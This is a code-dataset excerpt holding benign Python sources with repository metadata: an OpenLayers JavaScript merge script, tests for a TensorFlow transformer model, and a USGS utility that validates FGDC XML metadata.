2015-07-17T19:01:07.000Z
|
2015-07-17T19:01:07.000Z
|
mergejs.py
|
tmcw/OpenLayerer
|
44212b0f9a8aae71f6f96f6357671e89f6ea6cc5
|
[
"Apache-2.0",
"BSD-2-Clause"
] | null | null | null |
mergejs.py
|
tmcw/OpenLayerer
|
44212b0f9a8aae71f6f96f6357671e89f6ea6cc5
|
[
"Apache-2.0",
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python
#
# Merge multiple JavaScript source code files into one.
#
# Usage:
# This script requires source files to have dependencies specified in them.
#
# Dependencies are specified with a comment of the form:
#
# // @requires <file path>
#
# e.g.
#
# // @requires Geo/DataSource.js
#
# This script should be executed like so:
#
# mergejs.py <output.js> <directory> [...]
#
# e.g.
#
# mergejs.py openlayers.js Geo/ CrossBrowser/
#
# This example will cause the script to walk the `Geo` and
# `CrossBrowser` directories--and subdirectories thereof--and import
# all `*.js` files encountered. The dependency declarations will be extracted
# and then the source code from imported files will be output to
# a file named `openlayers.js` in an order which fulfils the dependencies
# specified.
#
#
# Note: This is a very rough initial version of this code.
#
# -- Copyright 2005-2008 MetaCarta, Inc. / OpenLayers project --
#
# TODO: Allow files to be excluded. e.g. `Crossbrowser/DebugMode.js`?
# TODO: Report error when dependency can not be found rather than KeyError.
import os, sys
SUFFIX_JAVASCRIPT = ".js"
RE_REQUIRE = "@requires:? (.*)\n" # TODO: Ensure in comment?
def scanjs(sourceDirectory, config = None):
""" scans scanDirectory recursively and returns a list of paths to javascript files
:param sourceDirectory: the directory root
:return list object of all file paths
"""
allFiles = []
## Find all the Javascript source files
for root, dirs, files in os.walk(sourceDirectory):
for filename in files:
if filename.endswith(SUFFIX_JAVASCRIPT) and not filename.startswith("."):
filepath = os.path.join(root, filename)[len(sourceDirectory)+1:]
filepath = filepath.replace("\\", "/")
if config and config.include:
if filepath in config.include or filepath in config.forceFirst:
allFiles.append(filepath)
elif (not config) or (filepath not in config.exclude):
allFiles.append(filepath)
return allFiles
def merge (sourceDirectory, config = None):
""" Merges source files within a given directory according to a configuration
:param sourceDirectory: a string designating the path of the OpenLayers source
:param config: a mergejs.Config object
"""
from toposort import toposort
allFiles = scanjs(sourceDirectory, config)
## Header inserted at the start of each file in the output
HEADER = "/* " + "=" * 70 + "\n %s\n" + " " + "=" * 70 + " */\n\n"
files = {}
## Import file source code
## TODO: Do import when we walk the directories above?
for filepath in allFiles:
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
complete = False
resolution_pass = 1
while not complete:
order = [] # List of filepaths to output, in a dependency satisfying order
nodes = []
routes = []
## Resolve the dependencies
resolution_pass += 1
for filepath, info in files.items():
nodes.append(filepath)
for neededFilePath in info.requires:
routes.append((neededFilePath, filepath))
for dependencyLevel in toposort(nodes, routes):
for filepath in dependencyLevel:
order.append(filepath)
if not files.has_key(filepath):
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
# Double check all dependencies have been met
complete = True
try:
for fp in order:
if max([order.index(rfp) for rfp in files[fp].requires] +
[order.index(fp)]) != order.index(fp):
complete = False
except:
complete = False
## Move forced first and last files to the required position
if config:
order = config.forceFirst + [item
for item in order
if ((item not in config.forceFirst) and
(item not in config.forceLast))] + config.forceLast
## Output the files in the determined order
result = []
for fp in order:
f = files[fp]
result.append(HEADER % f.filepath)
source = f.source
result.append(source)
if not source.endswith("\n"):
result.append("\n")
return "".join(result)
if __name__ == "__main__":
from optparse import OptionParser
usage = "usage: mergejs.py <output.js> <source directory> [--config config filename]"
parser = OptionParser(usage=usage)
parser.add_option('-c', '--config', dest="config_filename", action="store",
help="Config file name")
(options, args) = parser.parse_args()
try:
outputFilename = sys.argv[0]
sourceDirectory = sys.argv[1]
except IndexError:
parser.print_help()
sys.exit()
if options.config_filename:
config = Config()
config.read(options.config_filename)
else:
config = None
output = merge(sourceDirectory, config)
file(outputFilename, "w").write(output)
| 32.707113
| 102
| 0.612639
|
#!/usr/bin/env python
#
# Merge multiple JavaScript source code files into one.
#
# Usage:
# This script requires source files to have dependencies specified in them.
#
# Dependencies are specified with a comment of the form:
#
# // @requires <file path>
#
# e.g.
#
# // @requires Geo/DataSource.js
#
# This script should be executed like so:
#
# mergejs.py <output.js> <directory> [...]
#
# e.g.
#
# mergejs.py openlayers.js Geo/ CrossBrowser/
#
# This example will cause the script to walk the `Geo` and
# `CrossBrowser` directories--and subdirectories thereof--and import
# all `*.js` files encountered. The dependency declarations will be extracted
# and then the source code from imported files will be output to
# a file named `openlayers.js` in an order which fulfils the dependencies
# specified.
#
#
# Note: This is a very rough initial version of this code.
#
# -- Copyright 2005-2008 MetaCarta, Inc. / OpenLayers project --
#
# TODO: Allow files to be excluded. e.g. `Crossbrowser/DebugMode.js`?
# TODO: Report error when dependency can not be found rather than KeyError.
import re, os, sys
SUFFIX_JAVASCRIPT = ".js"
RE_REQUIRE = "@requires:? (.*)\n" # TODO: Ensure in comment?
class SourceFile:
"""
Represents a Javascript source code file.
"""
def __init__(self, filepath, source):
"""
"""
self.filepath = filepath
self.source = source
self.requiredBy = []
def _getRequirements(self):
"""
Extracts the dependencies specified in the source code and returns
a list of them.
"""
# TODO: Cache?
return re.findall(RE_REQUIRE, self.source)
requires = property(fget=_getRequirements, doc="")
class Config:
"""
Represents a parsed configuration file.
A configuration file should be of the following form:
[first]
3rd/prototype.js
core/application.js
core/params.js
# A comment
[last]
core/api.js # Another comment
[exclude]
3rd/logger.js
All headings are required.
The files listed in the `first` section will be forced to load
*before* all other files (in the order listed). The files in `last`
section will be forced to load *after* all the other files (in the
order listed).
The files list in the `exclude` section will not be imported.
Any text appearing after a # symbol indicates a comment.
"""
def __init__(self, **kwargs):
self.forceFirst = kwargs.get('forceFirst', [])
self.forceLast = kwargs.get('forceLast', [])
self.include = kwargs.get('include', [])
self.exclude = kwargs.get('exclude', [])
def read(self, filename):
"""
Parses the content of the named file and stores the values.
:param filename: the path to a configuration file
:return none
"""
lines = [re.sub("#.*?$", "", line).strip() # Assumes end-of-line character is present
for line in open(filename)
if line.strip() and not line.strip().startswith("#")] # Skip blank lines and comments
self.forceFirst = lines[lines.index("[first]") + 1:lines.index("[last]")]
self.forceLast = lines[lines.index("[last]") + 1:lines.index("[include]")]
self.include = lines[lines.index("[include]") + 1:lines.index("[exclude]")]
self.exclude = lines[lines.index("[exclude]") + 1:]
def scanjs(sourceDirectory, config = None):
""" scans scanDirectory recursively and returns a list of paths to javascript files
:param sourceDirectory: the directory root
:return list object of all file paths
"""
allFiles = []
## Find all the Javascript source files
for root, dirs, files in os.walk(sourceDirectory):
for filename in files:
if filename.endswith(SUFFIX_JAVASCRIPT) and not filename.startswith("."):
filepath = os.path.join(root, filename)[len(sourceDirectory)+1:]
filepath = filepath.replace("\\", "/")
if config and config.include:
if filepath in config.include or filepath in config.forceFirst:
allFiles.append(filepath)
elif (not config) or (filepath not in config.exclude):
allFiles.append(filepath)
return allFiles
def merge (sourceDirectory, config = None):
""" Merges source files within a given directory according to a configuration
:param sourceDirectory: a string designating the path of the OpenLayers source
:param config: a mergejs.Config object
"""
from toposort import toposort
allFiles = scanjs(sourceDirectory, config)
## Header inserted at the start of each file in the output
HEADER = "/* " + "=" * 70 + "\n %s\n" + " " + "=" * 70 + " */\n\n"
files = {}
## Import file source code
## TODO: Do import when we walk the directories above?
for filepath in allFiles:
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
complete = False
resolution_pass = 1
while not complete:
order = [] # List of filepaths to output, in a dependency satisfying order
nodes = []
routes = []
## Resolve the dependencies
resolution_pass += 1
for filepath, info in files.items():
nodes.append(filepath)
for neededFilePath in info.requires:
routes.append((neededFilePath, filepath))
for dependencyLevel in toposort(nodes, routes):
for filepath in dependencyLevel:
order.append(filepath)
if not files.has_key(filepath):
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
# Double check all dependencies have been met
complete = True
try:
for fp in order:
if max([order.index(rfp) for rfp in files[fp].requires] +
[order.index(fp)]) != order.index(fp):
complete = False
except:
complete = False
## Move forced first and last files to the required position
if config:
order = config.forceFirst + [item
for item in order
if ((item not in config.forceFirst) and
(item not in config.forceLast))] + config.forceLast
## Output the files in the determined order
result = []
for fp in order:
f = files[fp]
result.append(HEADER % f.filepath)
source = f.source
result.append(source)
if not source.endswith("\n"):
result.append("\n")
return "".join(result)
if __name__ == "__main__":
from optparse import OptionParser
usage = "usage: mergejs.py <output.js> <source directory> [--config config filename]"
parser = OptionParser(usage=usage)
parser.add_option('-c', '--config', dest="config_filename", action="store",
help="Config file name")
(options, args) = parser.parse_args()
try:
outputFilename = sys.argv[0]
sourceDirectory = sys.argv[1]
except IndexError:
parser.print_help()
sys.exit()
if options.config_filename:
config = Config()
config.read(options.config_filename)
else:
config = None
output = merge(sourceDirectory, config)
file(outputFilename, "w").write(output)
| 0
| 0
| 0
| 2,220
| 0
| 0
| 0
| 4
| 46
|
37506a8286c5b05402cb22c60eb6b8354ead4f28
| 5,955
|
py
|
Python
|
test/core/dnn/transformer_test.py
|
ClaudioBorges/ehrudite
|
8633995d3bf795fffeccabd7d20be522241f3bb5
|
[
"Apache-2.0"
] | null | null | null |
test/core/dnn/transformer_test.py
|
ClaudioBorges/ehrudite
|
8633995d3bf795fffeccabd7d20be522241f3bb5
|
[
"Apache-2.0"
] | null | null | null |
test/core/dnn/transformer_test.py
|
ClaudioBorges/ehrudite
|
8633995d3bf795fffeccabd7d20be522241f3bb5
|
[
"Apache-2.0"
] | 1
|
2022-03-18T09:26:05.000Z
|
2022-03-18T09:26:05.000Z
|
"""The test file for transformer DNN"""
import ehrudite.core.dnn.transformer as transformer
| 34.224138
| 87
| 0.674559
|
"""The test file for transformer DNN"""
import ehrudite.core.dnn.transformer as transformer
import random
import tensorflow as tf
def test_transformer_encoder_decoder_layer():
batch_size = random.randint(8, 64)
d_model = 2 ** random.randint(7, 9)
dff = random.randint(512, 2048)
input_seq_len = random.randint(40, 50)
target_seq_len = random.randint(10, 30)
num_heads = 2 ** random.randint(1, 4)
encoder_layer = transformer.EncoderLayer(d_model, num_heads, dff)
encoder_layer_output = encoder_layer(
tf.random.uniform((batch_size, input_seq_len, d_model)), False, None
)
assert (batch_size, input_seq_len, d_model) == encoder_layer_output.shape
decoder_layer = transformer.DecoderLayer(d_model, num_heads, dff)
decoder_layer_output, _, _ = decoder_layer(
tf.random.uniform((batch_size, target_seq_len, d_model)),
encoder_layer_output,
False,
None,
None,
)
assert (batch_size, target_seq_len, d_model) == decoder_layer_output.shape
def test_transformer_encoder_decoder():
batch_size = random.randint(8, 64)
d_model = 2 ** random.randint(7, 9)
dff = random.randint(512, 2048)
input_seq_len = random.randint(40, 50)
input_vocab_size = random.randint(1000, 10000)
maximum_position_encoding = random.randint(1024, 4096)
num_heads = 2 ** random.randint(1, 4)
num_layers = random.randint(2, 4)
target_seq_len = random.randint(10, 30)
target_vocab_size = random.randint(1000, 10000)
encoder = transformer.Encoder(
num_layers=num_layers,
d_model=d_model,
num_heads=num_heads,
dff=dff,
input_vocab_size=input_vocab_size,
maximum_position_encoding=maximum_position_encoding,
)
temp_input = tf.random.uniform(
(batch_size, input_seq_len), dtype=tf.int64, minval=0, maxval=200
)
encoder_output = encoder(temp_input, training=False, mask=None)
assert encoder_output.shape == (batch_size, input_seq_len, d_model)
decoder = transformer.Decoder(
num_layers=num_layers,
d_model=d_model,
num_heads=num_heads,
dff=dff,
target_vocab_size=target_vocab_size,
maximum_position_encoding=maximum_position_encoding,
)
temp_input = tf.random.uniform(
(batch_size, target_seq_len), dtype=tf.int64, minval=0, maxval=200
)
output, attn = decoder(
temp_input,
enc_output=encoder_output,
training=False,
look_ahead_mask=None,
padding_mask=None,
)
assert output.shape == (batch_size, target_seq_len, d_model)
assert len(attn.keys()) == 2
def test_transformer_positional_encoding():
maximum_position_encoding = random.randint(1024, 4096)
d_model = 2 ** random.randint(7, 9)
pos_encoding = transformer._positional_encoding(maximum_position_encoding, d_model)
assert pos_encoding.shape == (1, maximum_position_encoding, d_model)
def test_transformer_scaled_dot_product_attention():
# Both K and V penultimate dimension must match
# Both K and Q leading dimension must mathc
temp_k = tf.constant(
[[10, 0, 0], [0, 10, 0], [0, 0, 10], [0, 0, 10]], dtype=tf.float32
) # (4, 3)
temp_v = tf.constant(
[[1, 0], [10, 0], [100, 5], [1000, 6]], dtype=tf.float32
) # (4, 2)
# This `query` aligns with the second `key`,
# so the second `value` is returned.
temp_q = tf.constant([[0, 10, 0]], dtype=tf.float32) # (1, 3)
temp_out, temp_attn = transformer.scaled_dot_product_attention(
temp_q, temp_k, temp_v, None
)
assert temp_attn.shape == (temp_q.shape[0], temp_v.shape[0])
assert temp_out.shape == (temp_q.shape[0], temp_v.shape[1])
temp_q = tf.constant(
[[0, 0, 10], [0, 10, 0], [10, 10, 0]], dtype=tf.float32
) # (3, 3)
temp_out, temp_attn = transformer.scaled_dot_product_attention(
temp_q, temp_k, temp_v, None
)
assert temp_attn.shape == (temp_q.shape[0], temp_v.shape[0])
assert temp_out.shape == (temp_q.shape[0], temp_v.shape[1])
def test_multi_head_attention():
batch_size = random.randint(8, 64)
d_model = 2 ** random.randint(7, 9)
encoder_sequence = random.randint(50, 100)
num_heads = 2 ** random.randint(1, 4)
temp_mha = transformer.MultiHeadAttention(d_model=d_model, num_heads=num_heads)
y = tf.random.uniform(
(batch_size, encoder_sequence, d_model)
) # (batch_size, encoder_sequence, d_model)
out, attn = temp_mha(y, k=y, q=y, mask=None)
assert out.shape == y.shape
assert attn.shape == (y.shape[0], num_heads, y.shape[1], y.shape[1])
def test_transformer_model():
batch_size = random.randint(8, 64)
d_model = 2 ** random.randint(7, 9)
dff = random.randint(512, 2048)
input_seq_len = random.randint(40, 50)
input_vocab_size = random.randint(1000, 10000)
num_heads = 2 ** random.randint(1, 4)
num_layers = random.randint(2, 4)
target_seq_len = random.randint(10, 30)
target_vocab_size = random.randint(1000, 10000)
sample_transformer = transformer.Transformer(
num_layers=num_layers,
d_model=d_model,
num_heads=num_heads,
dff=dff,
input_vocab_size=input_vocab_size,
target_vocab_size=target_vocab_size,
pe_input=random.randint(5000, 10000),
pe_target=random.randint(2000, 4000),
)
temp_input = tf.random.uniform(
(batch_size, input_seq_len), dtype=tf.int64, minval=0, maxval=200
)
temp_target = tf.random.uniform(
(batch_size, target_seq_len), dtype=tf.int64, minval=0, maxval=200
)
fn_out, _ = sample_transformer([temp_input, temp_target], training=False)
assert fn_out.shape == (batch_size, target_seq_len, target_vocab_size)
def test_optimizer():
d_model = 2 ** random.randint(7, 9)
optimizer = transformer.optimizer(d_model)
assert optimizer is not None
| 0
| 0
| 0
| 0
| 0
| 5,656
| 0
| -6
| 205
|
8e54067c74c3efbad693b3983718ac2e603e8a34
| 9,858
|
py
|
Python
|
pymdwizard/core/fgdc_utils.py
|
mmfink/fort-pymdwizard
|
96f46e8cc2594b82b475b4f3fcae96a05ebc03e4
|
[
"CC-BY-4.0"
] | 53
|
2017-05-01T05:03:33.000Z
|
2022-03-13T04:49:15.000Z
|
pymdwizard/core/fgdc_utils.py
|
mmfink/fort-pymdwizard
|
96f46e8cc2594b82b475b4f3fcae96a05ebc03e4
|
[
"CC-BY-4.0"
] | 109
|
2017-05-17T15:15:40.000Z
|
2022-03-24T21:12:45.000Z
|
pymdwizard/core/fgdc_utils.py
|
mmfink/fort-pymdwizard
|
96f46e8cc2594b82b475b4f3fcae96a05ebc03e4
|
[
"CC-BY-4.0"
] | 17
|
2017-02-08T16:18:18.000Z
|
2021-01-28T19:38:09.000Z
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
"""
The MetadataWizard(pymdwizard) software was developed by the
U.S. Geological Survey Fort Collins Science Center.
See: https://github.com/usgs/fort-pymdwizard for current project source code
See: https://usgs.github.io/fort-pymdwizard/ for current user documentation
See: https://github.com/usgs/fort-pymdwizard/tree/master/examples
for examples of use in other scripts
License: Creative Commons Attribution 4.0 International (CC BY 4.0)
http://creativecommons.org/licenses/by/4.0/
PURPOSE
------------------------------------------------------------------------------
Module contains utility functions for interacting with XML FGDC records
SCRIPT DEPENDENCIES
------------------------------------------------------------------------------
This script is part of the pymdwizard package and is not intented to be
used independently. All pymdwizard package requirements are needed.
See imports section for external packages used in this script as well as
inter-package dependencies
U.S. GEOLOGICAL SURVEY DISCLAIMER
------------------------------------------------------------------------------
This software has been approved for release by the U.S. Geological Survey
(USGS). Although the software has been subjected to rigorous review,
the USGS reserves the right to update the software as needed pursuant to
further analysis and review. No warranty, expressed or implied, is made by
the USGS or the U.S. Government as to the functionality of the software and
related material nor shall the fact of release constitute any such warranty.
Furthermore, the software is released on condition that neither the USGS nor
the U.S. Government shall be held liable for any damages resulting from
its authorized or unauthorized use.
Any use of trade, product or firm names is for descriptive purposes only and
does not imply endorsement by the U.S. Geological Survey.
Although this information product, for the most part, is in the public domain,
it also contains copyrighted material as noted in the text. Permission to
reproduce copyrighted items for other than personal use must be secured from
the copyright owner.
------------------------------------------------------------------------------
"""
import json
from dateutil import parser
import defusedxml.lxml as lxml
import pandas as pd
from pymdwizard.core import xml_utils
from pymdwizard.core import utils
from collections import OrderedDict
FGDC_XSD_NAME = "FGDC/fgdc-std-001-1998-annotated.xsd"
BDP_XSD_NAME = "FGDC/BDPfgdc-std-001-1998-annotated.xsd"
def validate_xml(xml, xsl_fname="fgdc", as_dataframe=False):
"""
Parameters
----------
xml : lxml document
or
filename
or
string containing xml representation
xsl_fname : str (optional)
can be one of:
'fgdc' - uses the standard fgdc schema
../resources/FGDC/fgdc-std-001-1998-annotated.xsd
'bdp' = use the Biological Data profile schema,
../resources/FGDC/BDPfgdc-std-001-1998-annotated.xsd
full file path to another local schema.
if not specified defaults to 'fgdc'
as_dataframe : bool
used to specify return format (list of tuples or dataframe)
Returns
-------
list of tuples
(xpath, error message, line number)
or
pandas dataframe
"""
if xsl_fname.lower() == "fgdc":
xsl_fname = utils.get_resource_path(FGDC_XSD_NAME)
elif xsl_fname.lower() == "bdp":
xsl_fname = utils.get_resource_path(BDP_XSD_NAME)
else:
xsl_fname = xsl_fname
xmlschema = xml_utils.load_schema(xsl_fname)
xml_doc = xml_utils.xml_document_loader(xml)
xml_str = xml_utils.node_to_string(xml_doc)
tree_node = xml_utils.string_to_node(xml_str.encode("utf-8"))
lxml._etree._ElementTree(tree_node)
errors = []
srcciteas = []
src_xpath = "dataqual/lineage/srcinfo/srccitea"
src_nodes = tree_node.xpath(src_xpath)
for i, src in enumerate(src_nodes):
srcciteas.append(src.text)
if src.text is None:
if len(src_nodes) == 1:
errors.append(
(
"metadata/" + src_xpath,
"source citation abbreviation cannot be empty",
1,
)
)
else:
xpath = "metadata/dataqual/lineage/srcinfo[{}]/srccitea"
errors.append(
(
xpath.format(i + 1),
"source citation abbreviation cannot be empty",
1,
)
)
procstep_xpath = "dataqual/lineage/procstep"
procstep_nodes = tree_node.xpath(procstep_xpath)
for proc_i, proc in enumerate(procstep_nodes):
srcprod_nodes = proc.xpath("srcprod")
for srcprod_i, srcprod in enumerate(srcprod_nodes):
srcciteas.append(srcprod.text)
if srcprod.text is None:
error_xpath = procstep_xpath
if len(procstep_nodes) > 1:
error_xpath += "[{}]".format(proc_i + 1)
error_xpath += "/srcprod"
if len(srcprod_nodes) > 1:
error_xpath += "[{}]".format(proc_i + 1)
errors.append(
(
"metadata/" + error_xpath,
"source produced abbreviation cannot be empty",
1,
)
)
srcused_xpath = "dataqual/lineage/procstep/srcused"
srcused_nodes = tree_node.xpath(srcused_xpath)
for i, src in enumerate(srcused_nodes):
if src.text not in srcciteas:
if len(srcused_nodes) == 1:
errors.append(
(
"metadata/" + srcused_xpath,
"Source Used Citation Abbreviation {} "
"not found in Source inputs "
"used".format(src.text),
1,
)
)
else:
xpath = "metadata/dataqual/lineage/procstep[{}]/srcused"
errors.append(
(
xpath.format(i + 1),
"Source Used Citation Abbreviation {} "
"not found in Source inputs "
"used".format(src.text),
1,
)
)
if xmlschema.validate(tree_node) and not errors:
return []
line_lookup = dict(
[
(e.sourceline, tree_node.getroottree().getpath(e))
for e in tree_node.xpath(".//*")
]
)
sourceline = tree_node.sourceline
line_lookup[sourceline] = tree_node.getroottree().getpath(tree_node)
fgdc_lookup = get_fgdc_lookup()
for error in xmlschema.error_log:
error_msg = clean_error_message(error.message, fgdc_lookup)
try:
errors.append((line_lookup[error.line][1:], error_msg, error.line))
except KeyError:
errors.append(("Unknown", error_msg, error.line))
errors = list(OrderedDict.fromkeys(errors))
if as_dataframe:
cols = ["xpath", "message", "line number"]
return pd.DataFrame.from_records(errors, columns=cols)
else:
return errors
def get_fgdc_lookup():
"""
Loads the local resource, 'bdp_lookup' into a json object
Returns
-------
json fgdc item lookup
"""
annotation_lookup_fname = utils.get_resource_path("FGDC/bdp_lookup")
try:
with open(annotation_lookup_fname, encoding="utf-8") as data_file:
annotation_lookup = json.loads(data_file.read())
except TypeError:
with open(annotation_lookup_fname) as data_file:
annotation_lookup = json.loads(data_file.read())
return annotation_lookup
def clean_error_message(message, fgdc_lookup=None):
"""
Returns a cleaned up, more informative translation
of a raw xml schema error message.
Empty or missing elements are described in plain English
Parameters
----------
message : str
The raw message we will be cleaning up
Returns
-------
str : cleaned up error message
"""
parts = message.split()
if "Missing child element" in message:
clean_message = "The {} is missing the expected element(s) '{}'"
clean_message.format(parts[1][:-1], parts[-2])
elif (
r"' is not accepted by the pattern '\s*\S(.|\n|\r)*'" in message
or "'' is not a valid value of the atomic type" in message
):
shortname = parts[1][:-1].replace("'", "")
try:
longname = fgdc_lookup[shortname]["long_name"]
except (KeyError, TypeError):
longname = None
if longname is None:
name = shortname
else:
name = "{} ({})".format(longname, shortname)
clean_message = "The value for {} cannot be empty"
clean_message = clean_message.format(name)
else:
clean_message = message
return clean_message
def format_date(date_input):
"""
Convert a Python date object into an FGDC string format YYYYMMDD
Parameters
----------
date_input : str or datetime
if str provided must be in format that dateutil's parser can handle
Returns
-------
str : date formated in FGDC YYYYMMDD format
"""
if type(date_input) == str:
date_input = parser.parse(date_input)
return date_input.strftime("%Y%m%d")
| 33.993103
| 79
| 0.582674
|
#!/usr/bin/env python
# -*- coding: utf8 -*-
"""
The MetadataWizard(pymdwizard) software was developed by the
U.S. Geological Survey Fort Collins Science Center.
See: https://github.com/usgs/fort-pymdwizard for current project source code
See: https://usgs.github.io/fort-pymdwizard/ for current user documentation
See: https://github.com/usgs/fort-pymdwizard/tree/master/examples
for examples of use in other scripts
License: Creative Commons Attribution 4.0 International (CC BY 4.0)
http://creativecommons.org/licenses/by/4.0/
PURPOSE
------------------------------------------------------------------------------
Module contains utility functions for interacting with XML FGDC records
SCRIPT DEPENDENCIES
------------------------------------------------------------------------------
This script is part of the pymdwizard package and is not intented to be
used independently. All pymdwizard package requirements are needed.
See imports section for external packages used in this script as well as
inter-package dependencies
U.S. GEOLOGICAL SURVEY DISCLAIMER
------------------------------------------------------------------------------
This software has been approved for release by the U.S. Geological Survey
(USGS). Although the software has been subjected to rigorous review,
the USGS reserves the right to update the software as needed pursuant to
further analysis and review. No warranty, expressed or implied, is made by
the USGS or the U.S. Government as to the functionality of the software and
related material nor shall the fact of release constitute any such warranty.
Furthermore, the software is released on condition that neither the USGS nor
the U.S. Government shall be held liable for any damages resulting from
its authorized or unauthorized use.
Any use of trade, product or firm names is for descriptive purposes only and
does not imply endorsement by the U.S. Geological Survey.
Although this information product, for the most part, is in the public domain,
it also contains copyrighted material as noted in the text. Permission to
reproduce copyrighted items for other than personal use must be secured from
the copyright owner.
------------------------------------------------------------------------------
"""
import json
from dateutil import parser
import defusedxml.lxml as lxml
import pandas as pd
from pymdwizard.core import xml_utils
from pymdwizard.core import utils
from collections import OrderedDict
FGDC_XSD_NAME = "FGDC/fgdc-std-001-1998-annotated.xsd"
BDP_XSD_NAME = "FGDC/BDPfgdc-std-001-1998-annotated.xsd"
def validate_xml(xml, xsl_fname="fgdc", as_dataframe=False):
"""
Parameters
----------
xml : lxml document
or
filename
or
string containing xml representation
xsl_fname : str (optional)
can be one of:
'fgdc' - uses the standard fgdc schema
../resources/FGDC/fgdc-std-001-1998-annotated.xsd
'bdp' = use the Biological Data profile schema,
../resources/FGDC/BDPfgdc-std-001-1998-annotated.xsd
full file path to another local schema.
if not specified defaults to 'fgdc'
as_dataframe : bool
used to specify return format (list of tuples or dataframe)
Returns
-------
list of tuples
(xpath, error message, line number)
or
pandas dataframe
"""
if xsl_fname.lower() == "fgdc":
xsl_fname = utils.get_resource_path(FGDC_XSD_NAME)
elif xsl_fname.lower() == "bdp":
xsl_fname = utils.get_resource_path(BDP_XSD_NAME)
else:
xsl_fname = xsl_fname
xmlschema = xml_utils.load_schema(xsl_fname)
xml_doc = xml_utils.xml_document_loader(xml)
xml_str = xml_utils.node_to_string(xml_doc)
tree_node = xml_utils.string_to_node(xml_str.encode("utf-8"))
lxml._etree._ElementTree(tree_node)
errors = []
srcciteas = []
src_xpath = "dataqual/lineage/srcinfo/srccitea"
src_nodes = tree_node.xpath(src_xpath)
for i, src in enumerate(src_nodes):
srcciteas.append(src.text)
if src.text is None:
if len(src_nodes) == 1:
errors.append(
(
"metadata/" + src_xpath,
"source citation abbreviation cannot be empty",
1,
)
)
else:
xpath = "metadata/dataqual/lineage/srcinfo[{}]/srccitea"
errors.append(
(
xpath.format(i + 1),
"source citation abbreviation cannot be empty",
1,
)
)
procstep_xpath = "dataqual/lineage/procstep"
procstep_nodes = tree_node.xpath(procstep_xpath)
for proc_i, proc in enumerate(procstep_nodes):
srcprod_nodes = proc.xpath("srcprod")
for srcprod_i, srcprod in enumerate(srcprod_nodes):
srcciteas.append(srcprod.text)
if srcprod.text is None:
error_xpath = procstep_xpath
if len(procstep_nodes) > 1:
error_xpath += "[{}]".format(proc_i + 1)
error_xpath += "/srcprod"
if len(srcprod_nodes) > 1:
error_xpath += "[{}]".format(proc_i + 1)
errors.append(
(
"metadata/" + error_xpath,
"source produced abbreviation cannot be empty",
1,
)
)
srcused_xpath = "dataqual/lineage/procstep/srcused"
srcused_nodes = tree_node.xpath(srcused_xpath)
for i, src in enumerate(srcused_nodes):
if src.text not in srcciteas:
if len(srcused_nodes) == 1:
errors.append(
(
"metadata/" + srcused_xpath,
"Source Used Citation Abbreviation {} "
"not found in Source inputs "
"used".format(src.text),
1,
)
)
else:
xpath = "metadata/dataqual/lineage/procstep[{}]/srcused"
errors.append(
(
xpath.format(i + 1),
"Source Used Citation Abbreviation {} "
"not found in Source inputs "
"used".format(src.text),
1,
)
)
if xmlschema.validate(tree_node) and not errors:
return []
line_lookup = dict(
[
(e.sourceline, tree_node.getroottree().getpath(e))
for e in tree_node.xpath(".//*")
]
)
sourceline = tree_node.sourceline
line_lookup[sourceline] = tree_node.getroottree().getpath(tree_node)
fgdc_lookup = get_fgdc_lookup()
for error in xmlschema.error_log:
error_msg = clean_error_message(error.message, fgdc_lookup)
try:
errors.append((line_lookup[error.line][1:], error_msg, error.line))
except KeyError:
errors.append(("Unknown", error_msg, error.line))
errors = list(OrderedDict.fromkeys(errors))
if as_dataframe:
cols = ["xpath", "message", "line number"]
return pd.DataFrame.from_records(errors, columns=cols)
else:
return errors
def get_fgdc_lookup():
"""
Loads the local resource, 'bdp_lookup' into a json object
Returns
-------
json fgdc item lookup
"""
annotation_lookup_fname = utils.get_resource_path("FGDC/bdp_lookup")
try:
with open(annotation_lookup_fname, encoding="utf-8") as data_file:
annotation_lookup = json.loads(data_file.read())
except TypeError:
with open(annotation_lookup_fname) as data_file:
annotation_lookup = json.loads(data_file.read())
return annotation_lookup
def clean_error_message(message, fgdc_lookup=None):
"""
Returns a cleaned up, more informative translation
of a raw xml schema error message.
Empty or missing elements are described in plain English
Parameters
----------
message : str
The raw message we will be cleaning up
Returns
-------
str : cleaned up error message
"""
parts = message.split()
if "Missing child element" in message:
clean_message = "The {} is missing the expected element(s) '{}'"
clean_message.format(parts[1][:-1], parts[-2])
elif (
r"' is not accepted by the pattern '\s*\S(.|\n|\r)*'" in message
or "'' is not a valid value of the atomic type" in message
):
shortname = parts[1][:-1].replace("'", "")
try:
longname = fgdc_lookup[shortname]["long_name"]
except (KeyError, TypeError):
longname = None
if longname is None:
name = shortname
else:
name = "{} ({})".format(longname, shortname)
clean_message = "The value for {} cannot be empty"
clean_message = clean_message.format(name)
else:
clean_message = message
return clean_message
def format_date(date_input):
"""
Convert a Python date object into an FGDC string format YYYYMMDD
Parameters
----------
date_input : str or datetime
if str provided must be in format that dateutil's parser can handle
Returns
-------
str : date formated in FGDC YYYYMMDD format
"""
if type(date_input) == str:
date_input = parser.parse(date_input)
return date_input.strftime("%Y%m%d")
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
fa35d2742f0af2fece6c31ef5a0689b9bda6cc31
| 898
|
py
|
Python
|
localflavor/dk/forms.py
|
int2k/django-localflavor
|
fcda7f3aa3685f15f031b7d9b78f02e19ac5fb0b
|
[
"BSD-3-Clause"
] | 1
|
2020-07-12T23:24:38.000Z
|
2020-07-12T23:24:38.000Z
|
localflavor/dk/forms.py
|
KonstantinKlepikov/django-localflavor
|
87133f6cea1799e0b5e073dbc727dc88746f8fa8
|
[
"BSD-3-Clause"
] | null | null | null |
localflavor/dk/forms.py
|
KonstantinKlepikov/django-localflavor
|
